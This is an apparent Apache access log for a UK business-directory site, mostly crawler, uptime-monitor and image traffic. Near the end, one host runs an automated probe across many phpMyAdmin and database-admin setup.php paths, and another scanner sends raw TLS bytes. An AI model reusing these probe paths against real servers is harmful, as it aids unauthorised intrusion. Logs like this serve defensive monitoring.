85.208.98.23 - - [17/Jul/2025:20:21:28 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:21:28 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.25 - - [17/Jul/2025:20:22:00 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
147.185.132.237 - - [17/Jul/2025:20:22:53 +0000] "GET / HTTP/1.1" 301 237 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
216.73.216.27 - - [17/Jul/2025:20:26:39 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.98.23 - - [17/Jul/2025:20:26:52 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:26:52 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.73.216.27 - - [17/Jul/2025:20:27:00 +0000] "GET /sitemap.xml HTTP/1.1" 301 248 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
69.162.124.238 - - [17/Jul/2025:20:27:04 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.138 - - [17/Jul/2025:20:30:09 +0000] "GET /pages/10798-kwik-cars-uk.html HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:30:15 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:30:19 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
87.106.176.66 - - [17/Jul/2025:20:31:18 +0000] "GET / HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
216.245.221.83 - - [17/Jul/2025:20:32:08 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.137 - - [17/Jul/2025:20:33:16 +0000] "GET /pages/13634-flair-designer-wear.html HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:33:47 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
198.240.125.2 - - [17/Jul/2025:20:35:48 +0000] "GET /members/uploads/3/2236_3.jpg HTTP/1.1" 301 265 "https://www.google.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:114.0) Gecko/20100101 Firefox/114.0"
85.208.98.23 - - [17/Jul/2025:20:36:08 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:36:08 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.25 - - [17/Jul/2025:20:37:13 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
205.210.31.111 - - [17/Jul/2025:20:41:07 +0000] "GET / HTTP/1.1" 301 233 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
207.32.144.174 - - [17/Jul/2025:20:41:15 +0000] "GET /members/uploads/4/2946_4.jpg HTTP/1.1" 301 265 "https://www.google.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
216.144.248.30 - - [17/Jul/2025:20:42:19 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:20:42:26 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:42:26 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
89.248.168.30 - - [17/Jul/2025:20:44:17 +0000] "GET /articles/ HTTP/1.1" 301 242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
85.208.98.23 - - [17/Jul/2025:20:46:23 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:46:24 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
109.236.93.77 - - [17/Jul/2025:20:46:55 +0000] "GET /pages/41675-stl-communications-ltd.html HTTP/1.0" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
85.208.98.23 - - [17/Jul/2025:20:47:17 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:47:17 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.19 - - [17/Jul/2025:20:47:24 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:20:49:31 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:49:42 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:49:49 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:51:48 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:51:52 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:51:52 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.70.138 - - [17/Jul/2025:20:52:00 +0000] "GET /pages/2015-chateau-de-gateaux.html HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.245.221.83 - - [17/Jul/2025:20:52:29 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
204.44.85.221 - - [17/Jul/2025:20:54:13 +0000] "GET /members/uploads/1/3025_1.jpg HTTP/1.1" 301 265 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
51.68.236.90 - - [17/Jul/2025:20:54:15 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.236.90 - - [17/Jul/2025:20:54:15 +0000] "GET /pages/11115-the-gap-partnership.html HTTP/1.1" 301 273 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.236.90 - - [17/Jul/2025:20:54:16 +0000] "GET /pages/17053-photos-by-abhi.html HTTP/1.1" 301 268 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
85.208.98.23 - - [17/Jul/2025:20:54:47 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:54:47 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.70.137 - - [17/Jul/2025:20:55:07 +0000] "GET /pages/11916-william-smyth-son-roofing-contractors.html HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; GoogleOther)"
3.131.215.38 - - [17/Jul/2025:20:55:21 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
66.146.235.89 - - [17/Jul/2025:20:57:07 +0000] "GET /support/ HTTP/1.1" 301 241 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:114.0) Gecko/20100101 Firefox/114.0"
216.144.248.27 - - [17/Jul/2025:20:57:35 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.137 - - [17/Jul/2025:20:58:14 +0000] "GET /pages/11916-william-smyth-son-roofing-contractors.html HTTP/1.1" 301 291 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
204.76.203.219 - - [17/Jul/2025:20:59:15 +0000] "GET / HTTP/1.1" 301 233 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
85.208.98.23 - - [17/Jul/2025:20:59:49 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:20:59:49 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.21 - - [17/Jul/2025:21:02:40 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:02:40 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:02:40 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:03:07 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:03:24 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:03:24 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.23 - - [17/Jul/2025:21:07:44 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
84.32.92.206 - - [17/Jul/2025:21:07:46 +0000] "GET /members/uploads/3/706_3.jpg HTTP/1.1" 301 264 "https://www.google.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
31.14.32.8 - - [17/Jul/2025:21:09:30 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 zgrab/0.x"
31.14.32.8 - - [17/Jul/2025:21:10:26 +0000] "GET / HTTP/1.1" 301 230 "-" "Mozilla/5.0 (compatible; ModatScanner/1.1; +https://modat.io/)"
85.208.98.23 - - [17/Jul/2025:21:10:26 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:10:28 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x03\x01\xad\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x03\x01\xad\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x03\x01^\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x03\x01P\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x02\x01\xa2\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x03\x01\xa1\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x01\x01\xaf\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x01\x01\xaf\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x01\x01\xa5\x01" 403 - "-" "-"
31.14.32.8 - - [17/Jul/2025:21:10:34 +0000] "\x16\x03\x01\x01\xbc\x01" 403 - "-" "-"
216.144.248.18 - - [17/Jul/2025:21:12:48 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
51.68.107.154 - - [17/Jul/2025:21:13:27 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
51.68.107.154 - - [17/Jul/2025:21:13:27 +0000] "GET /pages/27750-stickershop.html HTTP/1.1" 301 265 "-" "Mozilla/5.0 (compatible; MJ12bot/v2.0.2; http://mj12bot.com/)"
85.208.98.23 - - [17/Jul/2025:21:15:29 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:15:29 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.70.138 - - [17/Jul/2025:21:16:08 +0000] "GET /pages/10681-forest-tails-dog-walking.html HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:16:57 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:17:51 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:17:52 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
69.162.124.227 - - [17/Jul/2025:21:17:54 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:18:35 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
211.249.68.5 - - [17/Jul/2025:21:20:59 +0000] "GET /members/uploads/1/1358_1.jpg HTTP/1.1" 301 265 "-" "python-requests/2.32.3"
211.249.68.5 - - [17/Jul/2025:21:21:31 +0000] "GET /members/uploads/1/1358_1.jpg HTTP/1.1" 301 265 "-" "python-requests/2.32.3"
66.249.70.138 - - [17/Jul/2025:21:22:23 +0000] "GET /pages/1188-loft-conversions-in-high-wycombe.html HTTP/1.1" 301 285 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.162.124.227 - - [17/Jul/2025:21:22:58 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:26:38 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:26:38 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.29 - - [17/Jul/2025:21:28:02 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:29:01 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:29:01 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
193.148.94.192 - - [17/Jul/2025:21:29:38 +0000] "GET /members/uploads/4/14866_4.jpg HTTP/1.1" 301 266 "https://www.google.com/" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
85.208.98.23 - - [17/Jul/2025:21:31:09 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.70.139 - - [17/Jul/2025:21:31:44 +0000] "GET /pages/4730-blackwell-academy-ipswich.html HTTP/1.1" 301 278 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.144.248.19 - - [17/Jul/2025:21:33:06 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:33:24 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:33:26 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
66.249.70.138 - - [17/Jul/2025:21:34:52 +0000] "GET /pages/12130-adi-leak-detection.html HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:37:40 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:37:40 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
216.144.248.18 - - [17/Jul/2025:21:38:10 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
85.208.98.23 - - [17/Jul/2025:21:38:27 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:38:27 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:40:01 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:40:01 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:40:18 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:41:35 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:42:17 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:42:17 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
106.75.50.69 - - [17/Jul/2025:21:42:41 +0000] "GET /version HTTP/1.1" 301 240 "-" "-"
106.75.50.69 - - [17/Jul/2025:21:42:41 +0000] "GET / HTTP/1.1" 301 233 "-" "-"
106.75.50.69 - - [17/Jul/2025:21:42:42 +0000] "GET / HTTP/1.1" 301 233 "-" "-"
106.75.50.69 - - [17/Jul/2025:21:42:42 +0000] "GET /v1 HTTP/1.1" 301 235 "-" "-"
106.75.50.69 - - [17/Jul/2025:21:42:42 +0000] "GET / HTTP/1.1" 301 233 "-" "-"
216.245.221.83 - - [17/Jul/2025:21:43:13 +0000] "HEAD / HTTP/1.1" 301 - "http://yellowleaf.co.uk" "Mozilla/5.0+(compatible; UptimeRobot/2.0; http://www.uptimerobot.com/)"
66.249.70.139 - - [17/Jul/2025:21:44:13 +0000] "GET /pages/2717-cr-joiners.html HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:45:14 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:45:16 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
112.124.71.153 - - [17/Jul/2025:21:45:36 +0000] "GET http://51.89.169.208:80/MyAdmin/scripts/setup.php HTTP/1.0" 301 242 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:45:42 +0000] "GET http://51.89.169.208:80/dbadmin/scripts/setup.php HTTP/1.0" 301 242 "-" "-"
85.208.98.23 - - [17/Jul/2025:21:45:50 +0000] "GET /robots.txt HTTP/1.1" 301 247 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.23 - - [17/Jul/2025:21:45:50 +0000] "GET /robots.txt HTTP/1.1" 301 243 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
112.124.71.153 - - [17/Jul/2025:21:45:52 +0000] "GET http://51.89.169.208:80/myadmin/scripts/setup.php HTTP/1.0" 301 242 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:45:53 +0000] "GET http://51.89.169.208:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 301 252 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:45:55 +0000] "GET http://51.89.169.208:80/sqlmanager/scripts/setup.php HTTP/1.0" 301 245 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:45:55 +0000] "GET http://51.89.169.208:80/db/scripts/setup.php HTTP/1.0" 301 237 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:45:55 +0000] "GET http://51.89.169.208:80/pma/scripts/setup.php HTTP/1.0" 301 238 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:03 +0000] "GET http://51.89.169.208:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 301 246 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:03 +0000] "GET http://51.89.169.208:80/SQL/scripts/setup.php HTTP/1.0" 301 238 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:13 +0000] "GET http://51.89.169.208:80/phpma/scripts/setup.php HTTP/1.0" 301 240 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:13 +0000] "GET http://51.89.169.208:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 301 245 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:19 +0000] "GET http://51.89.169.208:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 301 246 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:19 +0000] "GET http://51.89.169.208:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 301 249 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:20 +0000] "GET http://51.89.169.208:80/php/scripts/setup.php HTTP/1.0" 301 238 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:26 +0000] "GET http://51.89.169.208:80/sql/scripts/setup.php HTTP/1.0" 301 238 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:27 +0000] "GET http://51.89.169.208:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 301 254 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:27 +0000] "GET http://51.89.169.208:80/mysql-admin/scripts/setup.php HTTP/1.0" 301 246 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:27 +0000] "GET http://51.89.169.208:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 301 254 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:31 +0000] "GET http://51.89.169.208:80/webadmin/scripts/setup.php HTTP/1.0" 301 243 "-" "-"
112.124.71.153 - - [17/Jul/2025:21:46:31 +0000] "GET http://51.89.169.208:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 301 254 "-" "-"
